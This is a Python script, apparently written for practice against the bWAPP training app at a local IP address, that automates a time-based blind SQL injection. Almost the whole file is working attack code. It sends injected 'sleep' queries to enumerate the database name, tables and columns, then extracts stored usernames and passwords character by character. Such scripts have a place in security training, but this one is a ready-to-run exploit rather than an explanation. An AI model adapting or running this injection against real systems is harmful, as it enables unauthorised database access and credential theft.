#coding:utf-8
import requests
import time
#ip地址需要根据实际情况进行修改
ip_port="192.168.146.156:80"
data={
	"login":"bee",
	"password":"bug",
	"security_level":"0",
	"form":"submit"
}
urlLogin="http://%s/bWAPP/login.php"%ip_port
session=requests.session()
resp=session.post(urlLogin,data)
num=0
time_Interval=2


#获取一个数据库名称需要（前提有函数可以获取到数据库名称时：1、获取数据库长度、2、根据数据库长度进结合substr函数截取一个个字符转为ASCII比对即可）
#1、获取数据库名称长度
for i in range(1,21):
	url="http://%s/bWAPP/sqli_15.php?title=World War Z' and length(database())=%d and sleep(%d) -- &action=search"%(ip_port,i,time_Interval) 
	startTime=time.time()
	rsp=session.get(url)
	endTime=time.time()
	ga=endTime-startTime
	if ga>1:
		print("数据库名称的长度为： %d"%i)
		print("开始时间：%f"%startTime)
		print("结束时间：%f"%endTime)
		num=i
		break

#2、获取数据库名字
l=[]
print("%d"%num)
for j in range(1,num+1):
	for k in range(33,128):
		url="http://%s/bWAPP/sqli_15.php?title=World War Z' and ascii(substr(database(),%d,1))=%d   and sleep(%d) -- &action=search"%(ip_port,j,k,time_Interval)
		startTime=time.time()
		rsp=session.get(url)
		endTime=time.time()
		ga=endTime-startTime
		if ga>1:
			print(chr(k))
			l.append(chr(k))
			break
print(l)


#将数组转为字符串
def ConvertToString(array=[]):
	tmpStr=""
	tmpLen=len(array)
	for i in range(tmpLen):
		tmpStr+=array[i]
		if i==tmpLen:
			print("当前数组解析为字符串为：%s"%tmpStr)
	return tmpStr

curdbName=ConvertToString(l)
print("当前数据库名称为：%s"%curdbName)




#获取数据库下的所有表（1、获取到当前数据库下的表有多少个；2、使用起始索引分别遍历出所有表名称）
#1、获取当前数据库有几个表
nameMaxCount=64
dbTableCount=0
def GetAllTableCount(curdbName,dbNameMaxLen):
	tableCount=0
	for i in range(1,dbNameMaxLen+1):
		url="http://%s/bWAPP/sqli_15.php?title=World War Z' and if((select count(*) from information_schema.tables where table_schema = '%s') = %d, 1, 0)  and sleep(%d) -- &action=search"%(ip_port,curdbName,i,time_Interval)
		startTime=time.time()
		rsp=session.get(url)
		endTime=time.time()
		ga=endTime-startTime
		if ga>=time_Interval:
			tableCount=i
		continue
	print("当前数据库【%s】共有【%d】个表"%(curdbName,tableCount))
	return tableCount

dbTableCount=GetAllTableCount(curdbName,nameMaxCount)
     

#2、获取到当前数据库下的所有表名称(获取到的表名称分析长度，然后根据长度遍历匹配字符ASCII值获取到完整的名称)
perTableNameLen=[]

#2.1、获取到当前数据库下的所有表名称(获取到的表名称分析长度）
def GetAllTableNameLen(curdbName,dbTableCount,nameMaxCount):
	tmpPerTableNameLen=[]
	for i in range (dbTableCount):
		for j in range(nameMaxCount):
			url="http://%s/bWAPP/sqli_15.php?title=World War Z' AND LENGTH((select table_name from information_schema.tables where table_schema = '%s' limit %d, 1))=%d  and sleep(%d) -- &action=search"%(ip_port,curdbName,i,j,time_Interval)
			startTime=time.time()
			rsp=session.get(url)
			endTime=time.time()
			ga=endTime-startTime
			if ga>=time_Interval:
				tmpPerTableNameLen.append(j)
			continue
	return tmpPerTableNameLen
	
perTableNameLen=GetAllTableNameLen(curdbName,dbTableCount,nameMaxCount)

print("当前数据库【%s】共有【%d】个表 每个表名的长度分别为:"%(curdbName,dbTableCount))
print(perTableNameLen)

#2.2、根据每个表名称长度遍历匹配字符ASCII值获取到完整的名称
def GetAllTableName(curdbName,perTableNameLen=[],asciiStartValue=0,asciiEndValue=0):
	tmpAllTableName=[]
	tmpLen=len(perTableNameLen)

	for i in range(tmpLen):
		tmpCurTableName=[]
		for j in range(perTableNameLen[i]+1):
			for k in range(asciiStartValue,asciiEndValue):
				url="http://%s/bWAPP/sqli_15.php?title=World War Z' AND ASCII(SUBSTR((select table_name from information_schema.tables where table_schema = '%s' limit %d, 1),%d,1))=%d  and sleep(%d) -- &action=search"%(ip_port,curdbName,i,j,k,time_Interval)
				startTime=time.time()
				rsp=session.get(url)
				endTime=time.time()
				ga=endTime-startTime
				if ga>=time_Interval:
					tmpCurTableName.append(chr(k))
				continue
		print(tmpCurTableName)
		tmpStr = ConvertToString(tmpCurTableName)
		tmpAllTableName.append(tmpStr)
	print("当前的所有表名为：")
	print(tmpAllTableName)
	return tmpAllTableName

allTableName=GetAllTableName(curdbName,perTableNameLen,32,128)
	

#获取到当前表下的所有列名称（1、获取到当前表下的列有多少个；2、使用索引分别遍历出所有列名称）

#1、获取到指定表下包含的所有字段名数量
PerTableAllColumnCount=[]
def GetAllColumnCount(curTableName,columnNameMaxLen):
	tmpCount=0
	for i in range(columnNameMaxLen):
		url="http://%s/bWAPP/sqli_15.php?title=World War Z' AND if((SELECT COUNT(*) from information_schema.columns WHERE table_name='%s')=%d,1,0)  and sleep(%d) -- &action=search"%(ip_port,curTableName,i,time_Interval)
		startTime=time.time()
		rsp=session.get(url)
		endTime=time.time()
		ga=endTime-startTime
		if ga>=time_Interval:
			tmpCount=i
		continue
	print("当前表【%s】共有【%d】列"%(curTableName,tmpCount))
	return tmpCount

tmpvalue=GetAllColumnCount(allTableName[3],nameMaxCount)
PerTableAllColumnCount.append(tmpvalue)
    
#2、使用索引分别遍历出所有列名称
#2.1、根据获取到的表列数量取得每列的长度
def GetPerColumnLen(curTableName,curTableAllColumnCount,nameMaxLen):
	tmpPerColumnLen=[]
	for i in range(curTableAllColumnCount):
		for j in range(nameMaxLen):
			url="http://%s/bWAPP/sqli_15.php?title=World War Z' AND LENGTH((SELECT column_name from information_schema.columns WHERE table_name='%s' LIMIT %d,1))=%d  and sleep(%d) -- &action=search"%(ip_port,curTableName,i,j,time_Interval)
			startTime=time.time()
			rsp=session.get(url)
			endTime=time.time()
			ga=endTime-startTime
			if ga>=time_Interval:
				tmpPerColumnLen.append(j)
			continue
	print("当前表【%s】中每列名称对应的长度为："%(curTableName))
	print(tmpPerColumnLen)
	return tmpPerColumnLen

curTablePerColumnLen = GetPerColumnLen(allTableName[3],PerTableAllColumnCount[0],nameMaxCount)

#2.2、根据获取到的表中包含的每列数量长度匹配出对应的字段名称
def GetPerColumnName(curTableName,curTablePerColumnLen=[],asciiStartValue=0,asciiEndValue=0):
	tmpPerColumnName=[]
	perColumnLen=len(curTablePerColumnLen)
	for i in range(perColumnLen):
		tmpCurColumnName=[]
		for j in range(1,curTablePerColumnLen[i]+1):
			for k in range(asciiStartValue,asciiEndValue):
				url="http://%s/bWAPP/sqli_15.php?title=World War Z' AND ASCII(SUBSTR((SELECT column_name from information_schema.columns WHERE table_name='%s' LIMIT %d,1),%d,1))=%d  and sleep(%d) -- &action=search"%(ip_port,curTableName,i,j,k,time_Interval)
				startTime=time.time()
				rsp=session.get(url)
				endTime=time.time()
				ga=endTime-startTime
				if ga>=time_Interval:
					tmpCurColumnName.append(chr(k))
				continue
		tmpCurColumnNameStr=ConvertToString(tmpCurColumnName)
		tmpPerColumnName.append(tmpCurColumnNameStr)
	print("当前表【%s】对应的所有列名称为："%curTableName)
	print(tmpPerColumnName)
	return tmpPerColumnName
	   
curPerColumnName=GetPerColumnName(allTableName[3],curTablePerColumnLen,32,128)

#获取指定表中的指定字段对应的内容(1、获取表中的数据行数；2、获取到指定字段的单个值；3、获取到该字段对应单个值的长度；4、切割出单个值对应的每个字符；5、获取每个字符的ASCII值；6、使用ASCII码中的数字进行遍历匹配（匹配则为真，否则为假）)
tmpDataRowCount=10
#1、获取表中的数据行数
def GetDataRowCount(curTableName,dataMaxRow):
	tmpCount=0
	for i in range(dataMaxRow):
		url="http://%s/bWAPP/sqli_15.php?title=World War Z' AND if((SELECT COUNT(*) from %s)=%d,1,0)  and sleep(%d) -- &action=search"%(ip_port,curTableName,i,time_Interval)
		startTime=time.time()
		rsp=session.get(url)
		endTime=time.time()
		ga=endTime-startTime
		if ga>=time_Interval:
			tmpCount=i
		continue
	print("当前表【%s】共有【%d】行数据"%(curTableName,tmpCount))
	return tmpCount

dataRowCount=GetDataRowCount(allTableName[3],tmpDataRowCount)

#2、获取到指定字段的每个值长度
def GetPerValueLen(curTableName,curFieldName,dataRowCount,nameMaxLen):
	tmpPerValueLen=[]
	for i in range(dataRowCount):
		for j in range(nameMaxLen):
			url="http://%s/bWAPP/sqli_15.php?title=World War Z' AND LENGTH((SELECT %s from %s LIMIT %d,1))=%d  and sleep(%d) -- &action=search"%(ip_port,curFieldName,curTableName,i,j,time_Interval)
			startTime=time.time()
			rsp=session.get(url)
			endTime=time.time()
			ga=endTime-startTime
			if ga>=time_Interval:
				tmpPerValueLen.append(j)
			continue
	print("当前表【%s】中【%s】列对应值的长度分别为："%(curTableName,curFieldName))
	print(tmpPerValueLen)
	return tmpPerValueLen

perValueLen=GetPerValueLen(allTableName[3],curPerColumnName[1],tmpDataRowCount,nameMaxCount)

#3、获取到指定字段的每个值
def GetPerValue(curTableName,curFieldName,curPerValueLen=[],asciiStartValue=0,asciiEndValue=0):
	tmpPerValue=[]
	perValueLen=len(curPerValueLen)
	for i in range(perValueLen):
		tmpValue=[]
		for j in range(1,curPerValueLen[i]+1):
			for k in range(asciiStartValue,asciiEndValue):
				url="http://%s/bWAPP/sqli_15.php?title=World War Z' AND ASCII(SUBSTR((SELECT %s from %s LIMIT %d,1),%d,1))=%d  and sleep(%d) -- &action=search"%(ip_port,curFieldName,curTableName,i,j,k,time_Interval)
				startTime=time.time()
				rsp=session.get(url)
				endTime=time.time()
				ga=endTime-startTime
				if ga>=time_Interval:
					tmpValue.append(chr(k))
				continue
		tmpCurValueStr=ConvertToString(tmpValue)
		tmpPerValue.append(tmpCurValueStr)
	print("当前表【%s】中【%s】列对应值为："%(curTableName,curFieldName))
	print(tmpPerValue)
	return tmpPerValue

perValue=GetPerValue(allTableName[3],curPerColumnName[1],perValueLen,32,128)

#获取密码
pwdPerValueLen=GetPerValueLen(allTableName[3],curPerColumnName[2],tmpDataRowCount,nameMaxCount)

pwdPerValue=GetPerValue(allTableName[3],curPerColumnName[2],pwdPerValueLen,32,128)


